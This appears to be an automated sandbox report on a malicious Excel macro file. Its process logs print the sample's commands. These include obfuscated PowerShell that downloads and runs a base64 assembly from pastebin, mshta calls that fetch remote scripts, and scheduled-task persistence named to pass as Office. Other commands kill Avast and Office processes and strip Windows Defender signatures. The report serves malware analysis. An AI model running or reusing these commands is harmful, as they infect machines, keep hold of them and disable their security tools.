Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im AvastUi.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe MpCmdRun.exe -removedefinitions -dynamicsignatures	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im excel.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MSPUB.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im POWERPNT.EXE	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im MSASCuiL.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/UwmtjtG9',0,true)(window.close)	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/w3Y29LYH',0,true)(window.close)	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.1805382471.03E60000.00000002.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: Mcg4yE0diN.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module ThisWorkbook			Name: ThisWorkbook

Document contains an embedded VBA with many randomly named variables

Show sources

Source: Mcg4yE0diN.xls

Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High entropy of concatenated variable names

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisWorkbook

Name: ThisWorkbook

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)			Jump to behavior

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Allocates memory with a write watch (potentially for evading sandboxes)

Show sources

Source: C:\Windows\System32\mshta.exe	Memory allocated: 490000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1410000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1E40000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1EB0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 22B0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2490000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2830000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2870000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2B30000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 28F0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2B70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 3430000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 3130000 memory commit \| memory reserve \| memory write watch	Jump to behavior
